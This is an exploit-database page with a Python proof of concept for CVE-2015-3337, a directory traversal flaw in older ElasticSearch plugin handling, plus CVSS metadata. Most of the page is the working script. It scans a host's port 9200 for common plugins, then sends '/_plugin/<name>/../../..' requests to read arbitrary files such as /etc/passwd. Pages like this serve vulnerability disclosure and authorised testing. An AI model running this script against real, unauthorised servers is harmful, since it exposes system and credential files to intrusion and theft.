ElasticSearch Directory Traversal Proof Of Concept

Published
Credit
Risk
2015.05.05
Pedro Andujar
Medium
CWE
CVE
Local
Remote
CWE-22
CVE-2015-3337
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
sys.exit()

port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/"+plugin+"/../../../../../.."+fpath+ " HTTP/1.0\n"
"Host: "+host+"\n\n")
file = s.recv(2048)
print " [*] Trying to retrieve "+str(fpath)+":"
if ("HTTP/1.0 200 OK" in file):
print "\n"+file
else:
print "[-] File Not Found or system not vulnerable"

def pfind(plugin):
try:
socket.setdefaulttimeout(3)
s = socket.socket()
s.connect((host,port))
s.send("GET /_plugin/"+plugin+"/ HTTP/1.0\n"
"Host: "+host+"\n\n")
file = s.recv(16)
print "[*] Trying to find plugin "+plugin+":"
if ("HTTP/1.0 200 OK" in file):
print "[+] Plugin found!"
grab(plugin)
sys.exit()
else:
print "[-] Not Found "
except Exception, e:
print "[-] Error connecting to "+host+" "+str(e)
sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
pfind(plugin)



References:

http://cxsecurity.com/issue/WLB-2015040186


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com